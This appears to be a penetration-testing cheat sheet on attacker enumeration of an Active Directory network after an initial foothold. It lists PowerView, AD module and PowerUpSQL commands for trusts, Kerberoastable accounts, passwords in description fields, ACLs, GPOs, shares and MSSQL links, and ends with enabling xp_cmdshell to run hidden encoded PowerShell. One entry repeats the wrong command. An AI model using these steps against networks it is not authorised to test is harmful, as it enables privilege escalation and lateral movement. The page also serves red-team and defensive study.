Active Directory

Introduction

Once the attacker has obtained a foothold on a computer inside an Active Directory network, its design must be understood, including the number of users, groups, computers, OUs, ACLs, and their relationships.

In this phase, the attacker should be focused on enumerating information that can be further used to elevate privileges or perform lateral movements.

Domain

General Information

  • Get current domain

Get-Domain [-Domain <DIFFERENT_DOMAIN>]
  • Get current domain controller

Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | select Forest, Name, OSVersion | fl 
  • Get domain policy data

Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | select Forest, Name, OSVersion | fl 

Forest

  • Return the forest object

Get-Forest [-Forest <FOREST>]
  • Get all domains from your current forest

Get-ForestDomain [-Forest <FOREST>]
  • Get the Global Catalogs of the forest

Get-ForestGlobalCatalog [-Forest <FOREST>]

Trust

  • Return all domain trusts for the current or specified domain

Get-DomainTrust [-Domain <DomainName>]
  • Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds.

Get-DomainTrustMapping
  • Return all forest trusts for the current forest or a specified forest.

Get-ForestTrust [-Forest <"FOREST>"]

Users

General Information

  • Obtain users

Get-DomainUser -Identity <USERNAME> [-Properties DisplayName, MemberOf | fl]
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname
  • Built-in accounts

Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name, Description
  • Get group memberships

Get-DomainGroup -UserName "<USERNAME>"
  • Obtain the Last time a password was set of each user

Get-ADUser -Filter * -Properties * | select name ,logoncount ,@{expression={[datetime]::fromFileTime($_pwdlastset)}}
  • Finds domain machines where specific users are logged into. By default 'Domain Admins'

Find-DomainUserLocation -Verbose [-CheckAccess] [{-UserGroupIdentity|-UserIdentity} <Identity>]

Security

  • Kerberoast

Get-DomainUser -SPN | select serviceprincipalname
  • AS-Reporoast

Get-DomainUser -PreauthNotRequired -Verbose
  • Search passwords on the description attribute

Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name, Description
  • Show in which machine you are admin (based on your current privileges)

Find-LocalAdminAccess
  • Constrained delegation

Get-NetUser -TrustedToAuth

Groups

  • List all the groups in the current domain

Get-DomainGroup [| where Name -like "*Admins*" | select SamAccountName]
  • List all the members in a specific group:

Get-DomainGroupMember -Identity "Domain Admins" [| select MemberDistinguishedName]	
  • List groups of a user

Get-ADPrincipalGroupMembership <USER> 
  • Get GPOs of a group

Get-DomainGPOUserLocalGroupMapping [-Identity "<GROUP_NAME>" | -LocalGroup Administrators] | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl

Computers

General information

  • List computers

Get-NetComputer [| select samaccountname, DnsHostName, operatingsystem]
Get-DomainComputer -OperatingSystem "*Server 2016*"

# Get Name, IP and Operating System
Get-NetComputer  -Properties name,dnshostname, OperatingSystem | ForEach-Object { $_ | Add-Member -NotePropertyName IPAddressV4 -NotePropertyValue (Resolve-DnsName -Type A -Name $_.dnshostname).IPAddress -Force; $_  } | Select-object -Property name,dnshostname,IPAddressV4, OperatingSystem | Format-Table -AutoSize
  • Return PCs that can be pinged

Get-NetComputer -Ping
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName | fl Address,IPV4Address,IPV6Address,ResponseTime} 
  • Get users logged on (Requires admin privileges)

Get-NetLoggedon -ComputerName "<COMPUTER_NAME>" | Select Username
  • Get locally logged on users

Get-LoggedonLocal -ComputerName "<HOSTNAME>"
  • Enumerates local or groups on a machine (Requires admin privileges).

Get-NetLocalGroup -ComputerName "<HOSTNAME>"
# Get the members of Local Groups
Get-NetLocalGroupMember -ComputerName "<HOSTNAME>" -GroupName "<GROUP_NAME>"
  • Returns the last user who logged onto the local machine (Requires administrative rights and remote registry enabled on the target)

Get-LastLoggedOn -ComputerName <HOSTNAME>

Security

  • Enumerate all ACES for all domain computers that matches our current computer.

Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_ | Select-object -Property ObjectDN,ActiveDirectoryRights, AceType,ObjectAceType, Identity |  Format-List}}
Get-DomainComputer -UnConstrained | select samaccountname
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto,useraccountcontrol | fl

Get-NetComputer | where-object {$_."msds-allowedtodelegateto" -ne $null} | select name, msds-allowedtodelegateto, useraccountcontrol | fl

Get-NetComputer <COMPUTER_NAME> | Select-Object -ExpandProperty msds-allowedtodelegateto | fl

Need a privilege like WriteProperty, GenericAll, GenericWrite or WriteDacl on the computer object:

Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

Group Policies Objects (GPO)s

General information

  • Get list of GPO in current domain.

Get-DomainGPO [-ComputerIdentity <COMPUTER_NAME>] -Properties DisplayName | sort -Property DisplayName
  • Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences:

Get-DomainGPOLocalGroup [-ComputerIdentity <COMPUTER_NAME>] | select GPODisplayName, GroupName
  • Enumerates the machines where a specific domain user/group is a member of a specific local group (Useful for finding where domain groups have local admin access):

Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
  • Finds what users/groups are in the specified local group for a target machine through GPO correlation

Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity "<HOSTNAME>"

Get Modifiable GPOs

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty|GenericWrite" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

Principals with "Create groupPolicyContainer objects" privilege

Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

Organizational Units (OU)

  • Get Domain Organizational Units:

Get-DomainOU [-Properties Name | sort -Property Name]
  • Get GPO applied to an OU

Get-DomainGPO -Identity "<GPLink_RelativeCN>"

Access Control Lists (ACL)s

  • Enumerate user rights:

Get-ObjectAcl -SamAccountName "<USER>" -ResolveGUIDs 
  • Returns the ACLs associated with a specific active directory object.

Get-DomainObjectAcl -ResolveGUIDs -SamAccountName "<USERNAME>"
  • Finds interesting object ACLS in the current domain

Find-InterestingDomainAcl -ResolveGUIDs
  • Enumerate RDP Users permissions

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Shares

  • Enumerate shares:

Find-DomainShare
# Enumerate the Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
  • Enumerates the shares you have access

Find-DomainShare -CheckShareAccess
  • Find shares on hosts in current domain.

Invoke-ShareFinder -Verbose
  • Get all fileservers of the domain

Get-NetFileServer
  • Searches for files matching specific criteria on readable shares in the domain

Invoke-FileFinder -Verbose

MSSQL

General information

  • Discover Active Directory Domain SQL Server Instances

Get-SQLInstanceDomain
  • Tests if the current Windows account or provided SQL Server login can log into an SQL Server.

Get-SQLConnectionTest -Instance "<HOSTNAME,PORT>" | fl
# If there are several instances use the following oneline
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
  • Returns basic server and user information from target SQL Servers.

Get-SQLServerInfo -Instance "<HOSTNAME,PORT>"
  • Look for links to remote servers

Get-SQLServerLink -Verbose -Instance "<HOSTNAME,PORT>" 
  • Enumerate and follow MSSQL database links

Get-SQLServerLinkCrawl -Verbose -Instance "<HOSTNAME,PORT>" 

Perform Queries

  • Perform queries

Get-SQLQuery -Instance "<HOSTNAME,PORT>" -Query "select @@servername"
  • Perform queries using the linked database

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');

CMDShell

  • Check if xp_cmdshell module is enabled

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'
  • Enable xp_cmdshell

sp_configure 'Show Advanced Options', 1; RECONFIGURE;sp_configure 'xp_cmdshell', 1; RECONFIGURE;
  • Execute commands

"EXEC xp_cmdshell 'powershell -w hidden -enc <ENCODED_COMMAND>';

Tools

  • LinWinPwn: Automates a number of Active Directory Enumeration and Vulnerability checks.

  • PowerView: PowerShell tool to gain network situational awareness on Windows domains.

  • ADSearch: Perform LDAP queries.

  • PowerUPSQL: Module that includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post-exploitation actions such as OS command execution.

  • ADModule: The Active Directory module for Windows PowerShell.

References

Last updated